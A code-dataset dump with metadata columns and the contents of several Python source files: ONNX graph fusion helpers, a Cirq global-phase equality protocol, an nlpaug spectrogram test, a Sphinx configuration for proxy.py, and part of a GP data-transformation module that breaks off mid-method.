hexsha stringlengths 40 40 | size int64 4 996k | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 996k | avg_line_length float64 1.33 58.2k | max_line_length int64 2 323k | alphanum_fraction float64 0 0.97 | content_no_comment stringlengths 0 946k | is_comment_constant_removed bool 2
classes | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7900e39d54b01c16f8a60533eabc3552bdaf547d | 2,421 | py | Python | examples/fastformers/onnx_graph_optimizer/fusion_utils.py | kiminh/fastformers | 8f1aa4f719d7edfa4e77e03d518f7bad2d61004d | [
"Apache-2.0"
] | 1 | 2021-01-11T18:40:10.000Z | 2021-01-11T18:40:10.000Z | examples/fastformers/onnx_graph_optimizer/fusion_utils.py | kiminh/fastformers | 8f1aa4f719d7edfa4e77e03d518f7bad2d61004d | [
"Apache-2.0"
] | null | null | null | examples/fastformers/onnx_graph_optimizer/fusion_utils.py | kiminh/fastformers | 8f1aa4f719d7edfa4e77e03d518f7bad2d61004d | [
"Apache-2.0"
] | null | null | null | #-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
#--------------------------------------------------------------------------
from logging import getLogger
from .onnx_model import OnnxModel
from typing import Tuple
from onnx import helper, TensorProto
logger = getLogger(__name__)
class FusionUtils:
def __init__(self, model: OnnxModel):
self.model: OnnxModel = model
def cast_graph_input_to_int32(self, input_name: str) -> Tuple[bool, str]:
graph_input = self.model.find_graph_input(input_name)
if graph_input is not None and graph_input.type.tensor_type.elem_type != TensorProto.INT32:
cast_output, cast_node = self.cast_input_to_int32(input_name)
logger.debug(f"Casted graph input {input_name} to int32")
return True, cast_output
logger.debug(f"Did not cast graph input {input_name} to int32: found {graph_input is not None}")
return False, input_name
def cast_input_to_int32(self, input_name: str):
cast_output = input_name + '_int32'
# Avoid consequent Cast nodes.
inputs = [input_name]
output_name_to_node = self.model.output_name_to_node()
if input_name in output_name_to_node:
parent_node = output_name_to_node[input_name]
if parent_node and parent_node.op_type == 'Cast':
inputs = [parent_node.input[0]]
cast_node = helper.make_node('Cast', inputs=inputs, outputs=[cast_output])
cast_node.attribute.extend([helper.make_attribute("to", int(TensorProto.INT32))])
self.model.add_node(cast_node)
return cast_output, cast_node
def remove_cast_int32(self, input_name: str):
input_name_to_nodes = self.model.input_name_to_nodes()
nodes = input_name_to_nodes[input_name]
for node in nodes:
if node.op_type == "Cast":
is_int32 = False
for att in node.attribute:
if att.name == 'to' and att.i == int(TensorProto.INT32):
is_int32 = True
break
if is_int32:
output_name = node.output[0]
self.model.remove_node(node)
self.model.replace_input_of_all_nodes(output_name, input_name)
| 41.741379 | 104 | 0.609252 |
from logging import getLogger
from .onnx_model import OnnxModel
from typing import Tuple
from onnx import helper, TensorProto
logger = getLogger(__name__)
class FusionUtils:
def __init__(self, model: OnnxModel):
self.model: OnnxModel = model
def cast_graph_input_to_int32(self, input_name: str) -> Tuple[bool, str]:
graph_input = self.model.find_graph_input(input_name)
if graph_input is not None and graph_input.type.tensor_type.elem_type != TensorProto.INT32:
cast_output, cast_node = self.cast_input_to_int32(input_name)
logger.debug(f"Casted graph input {input_name} to int32")
return True, cast_output
logger.debug(f"Did not cast graph input {input_name} to int32: found {graph_input is not None}")
return False, input_name
def cast_input_to_int32(self, input_name: str):
cast_output = input_name + '_int32'
inputs = [input_name]
output_name_to_node = self.model.output_name_to_node()
if input_name in output_name_to_node:
parent_node = output_name_to_node[input_name]
if parent_node and parent_node.op_type == 'Cast':
inputs = [parent_node.input[0]]
cast_node = helper.make_node('Cast', inputs=inputs, outputs=[cast_output])
cast_node.attribute.extend([helper.make_attribute("to", int(TensorProto.INT32))])
self.model.add_node(cast_node)
return cast_output, cast_node
def remove_cast_int32(self, input_name: str):
input_name_to_nodes = self.model.input_name_to_nodes()
nodes = input_name_to_nodes[input_name]
for node in nodes:
if node.op_type == "Cast":
is_int32 = False
for att in node.attribute:
if att.name == 'to' and att.i == int(TensorProto.INT32):
is_int32 = True
break
if is_int32:
output_name = node.output[0]
self.model.remove_node(node)
self.model.replace_input_of_all_nodes(output_name, input_name)
| true | true |
7900e41edb6cc1cb6c455bcc68c0910a3eb7bae2 | 4,101 | py | Python | cirq-core/cirq/protocols/equal_up_to_global_phase_protocol.py | LLcat1217/Cirq | b88069f7b01457e592ad69d6b413642ef11a56b8 | [
"Apache-2.0"
] | 3,326 | 2018-07-18T23:17:21.000Z | 2022-03-29T22:28:24.000Z | cirq-core/cirq/protocols/equal_up_to_global_phase_protocol.py | bradyb/Cirq | 610b0d4ea3a7862169610797266734c844ddcc1f | [
"Apache-2.0"
] | 3,443 | 2018-07-18T21:07:28.000Z | 2022-03-31T20:23:21.000Z | cirq-core/cirq/protocols/equal_up_to_global_phase_protocol.py | bradyb/Cirq | 610b0d4ea3a7862169610797266734c844ddcc1f | [
"Apache-2.0"
] | 865 | 2018-07-18T23:30:24.000Z | 2022-03-30T11:43:23.000Z | # Copyright 2019 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numbers
from collections.abc import Iterable
from typing import Any, Union
import numpy as np
from typing_extensions import Protocol
from cirq import linalg
from cirq._doc import doc_private
from cirq.protocols.approximate_equality_protocol import approx_eq
class SupportsEqualUpToGlobalPhase(Protocol):
"""Object which can be compared for equality mod global phase."""
@doc_private
def _equal_up_to_global_phase_(self, other: Any, *, atol: Union[int, float]) -> bool:
"""Approximate comparator.
Types implementing this protocol define their own logic for comparison
with other types.
Args:
other: Target object for comparison of equality up to global phase.
atol: The minimum absolute tolerance. See `np.isclose()`
documentation for details.
Returns:
True if objects are equal up to a global phase, False otherwise.
Returns NotImplemented when checking equality up to a global phase
is not implemented for given types.
"""
def equal_up_to_global_phase(val: Any, other: Any, *, atol: Union[int, float] = 1e-8) -> bool:
"""Determine whether two objects are equal up to global phase.
If `val` implements a `_equal_up_to_global_phase_` method then it is
invoked and takes precedence over all other checks:
- For complex primitive type the magnitudes of the values are compared.
- For `val` and `other` both iterable of the same length, consecutive
elements are compared recursively. Types of `val` and `other` does not
necessarily needs to match each other. They just need to be iterable and
have the same structure.
- For all other types, fall back to `_approx_eq_`
Args:
val: Source object for approximate comparison.
other: Target object for approximate comparison.
atol: The minimum absolute tolerance. This places an upper bound on
the differences in *magnitudes* of two compared complex numbers.
Returns:
True if objects are approximately equal up to phase, False otherwise.
"""
# Attempt _equal_up_to_global_phase_ for val.
eq_up_to_phase_getter = getattr(val, '_equal_up_to_global_phase_', None)
if eq_up_to_phase_getter is not None:
result = eq_up_to_phase_getter(other, atol)
if result is not NotImplemented:
return result
# Fall back to _equal_up_to_global_phase_ for other.
other_eq_up_to_phase_getter = getattr(other, '_equal_up_to_global_phase_', None)
if other_eq_up_to_phase_getter is not None:
result = other_eq_up_to_phase_getter(val, atol)
if result is not NotImplemented:
return result
# Fall back to special check for numeric arrays.
# Defer to numpy automatic type casting to determine numeric type.
if isinstance(val, Iterable) and isinstance(other, Iterable):
a = np.asarray(val)
b = np.asarray(other)
if a.dtype.kind in 'uifc' and b.dtype.kind in 'uifc':
return linalg.allclose_up_to_global_phase(a, b, atol=atol)
# Fall back to approx_eq for compare the magnitude of two numbers.
if isinstance(val, numbers.Number) and isinstance(other, numbers.Number):
result = approx_eq(abs(val), abs(other), atol=atol) # type: ignore
if result is not NotImplemented:
return result
# Fall back to cirq approx_eq for remaining types.
return approx_eq(val, other, atol=atol)
| 40.60396 | 94 | 0.710802 |
import numbers
from collections.abc import Iterable
from typing import Any, Union
import numpy as np
from typing_extensions import Protocol
from cirq import linalg
from cirq._doc import doc_private
from cirq.protocols.approximate_equality_protocol import approx_eq
class SupportsEqualUpToGlobalPhase(Protocol):
@doc_private
def _equal_up_to_global_phase_(self, other: Any, *, atol: Union[int, float]) -> bool:
def equal_up_to_global_phase(val: Any, other: Any, *, atol: Union[int, float] = 1e-8) -> bool:
eq_up_to_phase_getter = getattr(val, '_equal_up_to_global_phase_', None)
if eq_up_to_phase_getter is not None:
result = eq_up_to_phase_getter(other, atol)
if result is not NotImplemented:
return result
other_eq_up_to_phase_getter = getattr(other, '_equal_up_to_global_phase_', None)
if other_eq_up_to_phase_getter is not None:
result = other_eq_up_to_phase_getter(val, atol)
if result is not NotImplemented:
return result
if isinstance(val, Iterable) and isinstance(other, Iterable):
a = np.asarray(val)
b = np.asarray(other)
if a.dtype.kind in 'uifc' and b.dtype.kind in 'uifc':
return linalg.allclose_up_to_global_phase(a, b, atol=atol)
if isinstance(val, numbers.Number) and isinstance(other, numbers.Number):
result = approx_eq(abs(val), abs(other), atol=atol)
if result is not NotImplemented:
return result
return approx_eq(val, other, atol=atol)
| true | true |
7900e45308c582c70cfe30e4d99db5aad0f8850d | 1,569 | py | Python | test/augmenter/spectrogram/test_loudness_spec.py | lucidworks/nlpaug | 8e47fa39200db17f4dc1d61567af1419bc389071 | [
"MIT"
] | 1 | 2021-06-09T20:07:30.000Z | 2021-06-09T20:07:30.000Z | test/augmenter/spectrogram/test_loudness_spec.py | lucidworks/nlpaug | 8e47fa39200db17f4dc1d61567af1419bc389071 | [
"MIT"
] | null | null | null | test/augmenter/spectrogram/test_loudness_spec.py | lucidworks/nlpaug | 8e47fa39200db17f4dc1d61567af1419bc389071 | [
"MIT"
] | null | null | null | import unittest
import os
import numpy as np
from dotenv import load_dotenv
from nlpaug.util import AudioLoader
import nlpaug.augmenter.spectrogram as nas
class TestLoudnessSpec(unittest.TestCase):
@classmethod
def setUpClass(cls):
env_config_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), "..", "..", "..", ".env")
)
load_dotenv(env_config_path)
# https://freewavesamples.com/yamaha-v50-rock-beat-120-bpm
cls.sample_wav_file = os.path.join(
os.environ.get("TEST_DIR"),
"res",
"audio",
"Yamaha-V50-Rock-Beat-120bpm.wav",
)
def test_no_change_source(self):
data = AudioLoader.load_mel_spectrogram(self.sample_wav_file, n_mels=128)
aug = nas.LoudnessAug(stateless=False)
aug_data = aug.augment(data)
comparison = data == aug_data
self.assertFalse(comparison.all())
def test_substitute(self):
data = AudioLoader.load_mel_spectrogram(self.sample_wav_file, n_mels=128)
aug = nas.LoudnessAug(stateless=False)
aug_data = aug.augment(data)
comparison = (
data[:, aug.time_start : aug.time_end]
== aug_data[:, aug.time_start : aug.time_end]
)
self.assertFalse(comparison.all())
comparison = data[:, : aug.time_start] == aug_data[:, : aug.time_start]
self.assertTrue(comparison.all())
comparison = data[:, aug.time_end :] == aug_data[:, aug.time_end :]
self.assertTrue(comparison.all())
| 33.382979 | 81 | 0.6297 | import unittest
import os
import numpy as np
from dotenv import load_dotenv
from nlpaug.util import AudioLoader
import nlpaug.augmenter.spectrogram as nas
class TestLoudnessSpec(unittest.TestCase):
@classmethod
def setUpClass(cls):
env_config_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), "..", "..", "..", ".env")
)
load_dotenv(env_config_path)
cls.sample_wav_file = os.path.join(
os.environ.get("TEST_DIR"),
"res",
"audio",
"Yamaha-V50-Rock-Beat-120bpm.wav",
)
def test_no_change_source(self):
data = AudioLoader.load_mel_spectrogram(self.sample_wav_file, n_mels=128)
aug = nas.LoudnessAug(stateless=False)
aug_data = aug.augment(data)
comparison = data == aug_data
self.assertFalse(comparison.all())
def test_substitute(self):
data = AudioLoader.load_mel_spectrogram(self.sample_wav_file, n_mels=128)
aug = nas.LoudnessAug(stateless=False)
aug_data = aug.augment(data)
comparison = (
data[:, aug.time_start : aug.time_end]
== aug_data[:, aug.time_start : aug.time_end]
)
self.assertFalse(comparison.all())
comparison = data[:, : aug.time_start] == aug_data[:, : aug.time_start]
self.assertTrue(comparison.all())
comparison = data[:, aug.time_end :] == aug_data[:, aug.time_end :]
self.assertTrue(comparison.all())
| true | true |
7900e48be6a61e1b7b02212b8a36802a97f40208 | 9,861 | py | Python | docs/conf.py | JerryKwan/proxy.py | 57aa628920a34a7c67925911c333c0b744ed0303 | [
"BSD-3-Clause"
] | null | null | null | docs/conf.py | JerryKwan/proxy.py | 57aa628920a34a7c67925911c333c0b744ed0303 | [
"BSD-3-Clause"
] | 9 | 2021-12-10T01:22:33.000Z | 2022-03-31T18:21:07.000Z | docs/conf.py | JerryKwan/proxy.py | 57aa628920a34a7c67925911c333c0b744ed0303 | [
"BSD-3-Clause"
] | null | null | null | # pylint: disable=invalid-name
# Requires Python 3.6+
# Ref: https://www.sphinx-doc.org/en/master/usage/configuration.html
"""Configuration for the Sphinx documentation generator."""
import sys
from functools import partial
from pathlib import Path
from setuptools_scm import get_version
# -- Path setup --------------------------------------------------------------
PROJECT_ROOT_DIR = Path(__file__).parents[1].resolve() # pylint: disable=no-member
get_scm_version = partial(get_version, root=PROJECT_ROOT_DIR)
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, str(PROJECT_ROOT_DIR))
# Make in-tree extension importable in non-tox setups/envs, like RTD.
# Refs:
# https://github.com/readthedocs/readthedocs.org/issues/6311
# https://github.com/readthedocs/readthedocs.org/issues/7182
sys.path.insert(0, str((Path(__file__).parent / '_ext').resolve()))
# -- Project information -----------------------------------------------------
github_url = 'https://github.com'
github_repo_org = 'abhinavsingh'
github_repo_name = 'proxy.py'
github_repo_slug = f'{github_repo_org}/{github_repo_name}'
github_repo_url = f'{github_url}/{github_repo_slug}'
github_sponsors_url = f'{github_url}/sponsors'
project = github_repo_name.title()
author = f'{project} project contributors'
copyright = author # pylint: disable=redefined-builtin
# The short X.Y version
version = '.'.join(
get_scm_version(
local_scheme='no-local-version',
).split('.')[:3],
)
# The full version, including alpha/beta/rc tags
release = get_scm_version()
rst_epilog = f"""
.. |project| replace:: {project}
"""
# -- General configuration ---------------------------------------------------
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# The reST default role (used for this markup: `text`) to use for all
# documents.
# Ref: python-attrs/attrs#571
default_role = 'any'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
# pygments_style = 'sphinx'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
# stdlib-party extensions:
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.extlinks',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
# Third-party extensions:
'myst_parser', # extended markdown; https://pypi.org/project/myst-parser/
'sphinxcontrib.apidoc',
]
# Conditional third-party extensions:
try:
import sphinxcontrib.spelling as _sphinxcontrib_spelling
except ImportError:
extensions.append('spelling_stub_ext')
else:
del _sphinxcontrib_spelling
extensions.append('sphinxcontrib.spelling')
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'en'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
'changelog-fragments.d/**', # Towncrier-managed change notes
]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'furo'
html_show_sphinx = True
html_theme_options = {
}
html_context = {
}
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = f'{project} Documentation'
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = 'Documentation'
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = f'https://{github_repo_name.replace(".", "")}.readthedocs.io/en/latest/'
# The master toctree document.
root_doc = master_doc = 'index' # Sphinx 4+ / 3- # noqa: WPS429
# -- Extension configuration -------------------------------------------------
# -- Options for intersphinx extension ---------------------------------------
intersphinx_mapping = {
'myst': ('https://myst-parser.rtfd.io/en/latest', None),
'python': ('https://docs.python.org/3', None),
'python2': ('https://docs.python.org/2', None),
}
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for sphinxcontrib.apidoc extension ------------------------------
apidoc_excluded_paths = [
'plugin/cache/*',
'testing/*.py',
]
apidoc_extra_args = [
'--implicit-namespaces',
'--private', # include “_private” modules
]
apidoc_module_dir = str(PROJECT_ROOT_DIR / 'proxy')
apidoc_module_first = False
apidoc_output_dir = 'pkg'
apidoc_separate_modules = True
apidoc_toc_file = None
# -- Options for sphinxcontrib.spelling extension ----------------------------
spelling_ignore_acronyms = True
spelling_ignore_importable_modules = True
spelling_ignore_pypi_package_names = True
spelling_ignore_python_builtins = True
spelling_ignore_wiki_words = True
spelling_show_suggestions = True
spelling_word_list_filename = [
'spelling_wordlist.txt',
]
# -- Options for extlinks extension ------------------------------------------
extlinks = {
'issue': (f'{github_repo_url}/issues/%s', '#'), # noqa: WPS323
'pr': (f'{github_repo_url}/pull/%s', 'PR #'), # noqa: WPS323
'commit': (f'{github_repo_url}/commit/%s', ''), # noqa: WPS323
'gh': (f'{github_url}/%s', 'GitHub: '), # noqa: WPS323
'user': (f'{github_sponsors_url}/%s', '@'), # noqa: WPS323
}
# -- Options for linkcheck builder -------------------------------------------
linkcheck_ignore = [
r'http://localhost:\d+/', # local URLs
]
linkcheck_workers = 25
# -- Options for myst_parser extension ------------------------------------------
myst_enable_extensions = [
'colon_fence', # allow to optionally use ::: instead of ```
'deflist',
'html_admonition', # allow having HTML admonitions
'html_image', # allow HTML <img> in Markdown
# FIXME: `linkify` turns "Proxy.Py` into a link so it's disabled now
# Ref: https://github.com/executablebooks/MyST-Parser/issues/428#issuecomment-970277208
# "linkify", # auto-detect URLs @ plain text, needs myst-parser[linkify]
'replacements', # allows Jinja2-style replacements
'smartquotes', # use "cursive" quotes
'substitution', # replace common ASCII shortcuts into their symbols
]
myst_substitutions = {
'project': project,
}
# -- Strict mode -------------------------------------------------------------
# The reST default role (used for this markup: `text`) to use for all
# documents.
# Ref: python-attrs/attrs#571
default_role = 'any'
nitpicky = True
_any_role = 'any'
_py_obj_role = 'py:obj'
_py_class_role = 'py:class'
nitpick_ignore = [
(_any_role, '<proxy.HttpProxyBasePlugin>'),
(_any_role, '__init__'),
(_any_role, 'Client'),
(_any_role, 'event_queue'),
(_any_role, 'fd_queue'),
(_any_role, 'flag.flags'),
(_any_role, 'flags.work_klass'),
(_any_role, 'flush'),
(_any_role, 'httpx'),
(_any_role, 'HttpParser.state'),
(_any_role, 'HttpProtocolHandler'),
(_any_role, 'multiprocessing.Manager'),
(_any_role, 'proxy.core.base.tcp_upstream.TcpUpstreamConnectionHandler'),
(_any_role, 'work_klass'),
(_py_class_role, '_asyncio.Task'),
(_py_class_role, 'asyncio.events.AbstractEventLoop'),
(_py_class_role, 'CacheStore'),
(_py_class_role, 'HttpParser'),
(_py_class_role, 'HttpProtocolHandlerPlugin'),
(_py_class_role, 'HttpProxyBasePlugin'),
(_py_class_role, 'HttpWebServerBasePlugin'),
(_py_class_role, 'multiprocessing.context.Process'),
(_py_class_role, 'multiprocessing.synchronize.Lock'),
(_py_class_role, 'NonBlockingQueue'),
(_py_class_role, 'paramiko.channel.Channel'),
(_py_class_role, 'proxy.http.parser.parser.T'),
(_py_class_role, 'proxy.plugin.cache.store.base.CacheStore'),
(_py_class_role, 'proxy.core.pool.AcceptorPool'),
(_py_class_role, 'proxy.core.executors.ThreadlessPool'),
(_py_class_role, 'proxy.core.acceptor.threadless.T'),
(_py_class_role, 'queue.Queue[Any]'),
(_py_class_role, 'TcpClientConnection'),
(_py_class_role, 'TcpServerConnection'),
(_py_class_role, 'unittest.case.TestCase'),
(_py_class_role, 'unittest.result.TestResult'),
(_py_class_role, 'UUID'),
(_py_class_role, 'Url'),
(_py_class_role, 'WebsocketFrame'),
(_py_class_role, 'Work'),
(_py_obj_role, 'proxy.core.acceptor.threadless.T'),
]
| 33.427119 | 96 | 0.673461 |
import sys
from functools import partial
from pathlib import Path
from setuptools_scm import get_version
PROJECT_ROOT_DIR = Path(__file__).parents[1].resolve()
get_scm_version = partial(get_version, root=PROJECT_ROOT_DIR)
sys.path.insert(0, str(PROJECT_ROOT_DIR))
sys.path.insert(0, str((Path(__file__).parent / '_ext').resolve()))
github_url = 'https://github.com'
github_repo_org = 'abhinavsingh'
github_repo_name = 'proxy.py'
github_repo_slug = f'{github_repo_org}/{github_repo_name}'
github_repo_url = f'{github_url}/{github_repo_slug}'
github_sponsors_url = f'{github_url}/sponsors'
project = github_repo_name.title()
author = f'{project} project contributors'
copyright = author
version = '.'.join(
get_scm_version(
local_scheme='no-local-version',
).split('.')[:3],
)
release = get_scm_version()
rst_epilog = f"""
.. |project| replace:: {project}
"""
today_fmt = '%B %d, %Y'
ault_role = 'any'
add_function_parentheses = True
add_module_names = True
show_authors = True
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.extlinks',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'myst_parser',
'sphinxcontrib.apidoc',
]
try:
import sphinxcontrib.spelling as _sphinxcontrib_spelling
except ImportError:
extensions.append('spelling_stub_ext')
else:
del _sphinxcontrib_spelling
extensions.append('sphinxcontrib.spelling')
language = 'en'
exclude_patterns = [
'changelog-fragments.d/**',
]
html_theme = 'furo'
html_show_sphinx = True
html_theme_options = {
}
html_context = {
}
html_last_updated_fmt = '%b %d, %Y'
root_doc = master_doc = 'index' hinx_mapping = {
'myst': ('https://myst-parser.rtfd.io/en/latest', None),
'python': ('https://docs.python.org/3', None),
'python2': ('https://docs.python.org/2', None),
}
todo_include_todos = True
apidoc_excluded_paths = [
'plugin/cache/*',
'testing/*.py',
]
apidoc_extra_args = [
'--implicit-namespaces',
'--private',
]
apidoc_module_dir = str(PROJECT_ROOT_DIR / 'proxy')
apidoc_module_first = False
apidoc_output_dir = 'pkg'
apidoc_separate_modules = True
apidoc_toc_file = None
spelling_ignore_acronyms = True
spelling_ignore_importable_modules = True
spelling_ignore_pypi_package_names = True
spelling_ignore_python_builtins = True
spelling_ignore_wiki_words = True
spelling_show_suggestions = True
spelling_word_list_filename = [
'spelling_wordlist.txt',
]
extlinks = {
'issue': (f'{github_repo_url}/issues/%s', '#'),
'pr': (f'{github_repo_url}/pull/%s', 'PR #'),
'commit': (f'{github_repo_url}/commit/%s', ''),
'gh': (f'{github_url}/%s', 'GitHub: '),
'user': (f'{github_sponsors_url}/%s', '@'),
}
linkcheck_ignore = [
r'http://localhost:\d+/',
]
linkcheck_workers = 25
myst_enable_extensions = [
'colon_fence',
'deflist',
'html_admonition',
'html_image',
# Ref: https://github.com/executablebooks/MyST-Parser/issues/428#issuecomment-970277208
# "linkify", # auto-detect URLs @ plain text, needs myst-parser[linkify]
'replacements', # allows Jinja2-style replacements
'smartquotes', # use "cursive" quotes
'substitution', # replace common ASCII shortcuts into their symbols
]
myst_substitutions = {
'project': project,
}
# -- Strict mode -------------------------------------------------------------
# The reST default role (used for this markup: `text`) to use for all
# documents.
# Ref: python-attrs/attrs#571
default_role = 'any'
nitpicky = True
_any_role = 'any'
_py_obj_role = 'py:obj'
_py_class_role = 'py:class'
nitpick_ignore = [
(_any_role, '<proxy.HttpProxyBasePlugin>'),
(_any_role, '__init__'),
(_any_role, 'Client'),
(_any_role, 'event_queue'),
(_any_role, 'fd_queue'),
(_any_role, 'flag.flags'),
(_any_role, 'flags.work_klass'),
(_any_role, 'flush'),
(_any_role, 'httpx'),
(_any_role, 'HttpParser.state'),
(_any_role, 'HttpProtocolHandler'),
(_any_role, 'multiprocessing.Manager'),
(_any_role, 'proxy.core.base.tcp_upstream.TcpUpstreamConnectionHandler'),
(_any_role, 'work_klass'),
(_py_class_role, '_asyncio.Task'),
(_py_class_role, 'asyncio.events.AbstractEventLoop'),
(_py_class_role, 'CacheStore'),
(_py_class_role, 'HttpParser'),
(_py_class_role, 'HttpProtocolHandlerPlugin'),
(_py_class_role, 'HttpProxyBasePlugin'),
(_py_class_role, 'HttpWebServerBasePlugin'),
(_py_class_role, 'multiprocessing.context.Process'),
(_py_class_role, 'multiprocessing.synchronize.Lock'),
(_py_class_role, 'NonBlockingQueue'),
(_py_class_role, 'paramiko.channel.Channel'),
(_py_class_role, 'proxy.http.parser.parser.T'),
(_py_class_role, 'proxy.plugin.cache.store.base.CacheStore'),
(_py_class_role, 'proxy.core.pool.AcceptorPool'),
(_py_class_role, 'proxy.core.executors.ThreadlessPool'),
(_py_class_role, 'proxy.core.acceptor.threadless.T'),
(_py_class_role, 'queue.Queue[Any]'),
(_py_class_role, 'TcpClientConnection'),
(_py_class_role, 'TcpServerConnection'),
(_py_class_role, 'unittest.case.TestCase'),
(_py_class_role, 'unittest.result.TestResult'),
(_py_class_role, 'UUID'),
(_py_class_role, 'Url'),
(_py_class_role, 'WebsocketFrame'),
(_py_class_role, 'Work'),
(_py_obj_role, 'proxy.core.acceptor.threadless.T'),
]
| true | true |
7900e4fba482c2349f7afd1bedc8ed327d0b15f8 | 4,326 | py | Python | GP/data_transformation.py | VirgiAgl/V_savigp | 310f31f789db34737313bf057ff1474e314d68fd | [
"Apache-2.0"
] | 7 | 2016-04-25T15:02:34.000Z | 2020-03-30T15:10:03.000Z | GP/data_transformation.py | VirgiAgl/V_savigp | 310f31f789db34737313bf057ff1474e314d68fd | [
"Apache-2.0"
] | null | null | null | GP/data_transformation.py | VirgiAgl/V_savigp | 310f31f789db34737313bf057ff1474e314d68fd | [
"Apache-2.0"
] | 5 | 2015-12-09T22:57:58.000Z | 2020-10-07T11:01:34.000Z | import numpy as np
from sklearn import preprocessing
class DataTransformation:
"""
A generic class for the transformation of data
"""
def __init__(self):
pass
def transform_X(self, X):
"""
transforms X
:param
X: Input X
:return
transformed X
"""
raise NotImplementedError()
def transform_Y(self, Y):
"""
transforms Y
:param
Y: Input Y
:return
transformed Y
"""
raise NotImplementedError()
def untransform_X(self, X):
"""
Untransforms X to its original values
:param
X: transformed X
:return
untransformed X
"""
raise NotImplementedError()
def untransform_Y(self, Y):
"""
Untransforms Y
:param
Y: transformed Y
:return
untransfomred Y
"""
raise NotImplementedError()
def untransform_Y_var(self, Yvar):
raise NotImplementedError()
def untransform_NLPD(self, NLPD):
"""
Untransfomrs NLPD to the original Y space
:param
NLPD: transfomred NLPD
:return
untransformed NLPD
"""
raise NotImplementedError()
class IdentityTransformation:
"""
Identity transformation. No transformation will be applied to data.
"""
def __init__(self):
pass
def transform_X(self, X):
return X
def transform_Y(self, Y):
return Y
def untransform_X(self, X):
return X
def untransform_Y(self, Y):
return Y
def untransform_Y_var(self, Yvar):
return Yvar
@staticmethod
def get_transformation(Y, X):
return IdentityTransformation()
def untransform_NLPD(self, NLPD):
return NLPD
class MeanTransformation(object, DataTransformation):
"""
Only transforms Y as follows:
transformed Y = untransformed Y - mean(Y)
"""
def __init__(self, mean):
super(MeanTransformation, self).__init__()
self.mean = mean
def transform_X(self, X):
return X
def transform_Y(self, Y):
return Y - self.mean
def untransform_X(self, X):
return X
def untransform_Y(self, Y):
return Y + self.mean
def untransform_Y_var(self, Yvar):
return Yvar
def untransform_NLPD(self, NLPD):
return NLPD
@staticmethod
def get_transformation(Y, X):
return MeanTransformation(Y.mean(axis=0))
class MeanStdYTransformation(object, DataTransformation):
"""
Transforms only Y in a way that the transformed Y has mean = 0 and std =1
"""
def __init__(self, scalar):
super(MeanStdYTransformation, self).__init__()
self.scalar = scalar
def transform_X(self, X):
return X
def transform_Y(self, Y):
return self.scalar.transform(Y)
def untransform_X(self, X):
return X
def untransform_Y(self, Y):
return self.scalar.inverse_transform(Y)
def untransform_Y_var(self, Yvar):
return Yvar
def untransform_NLPD(self, NLPD):
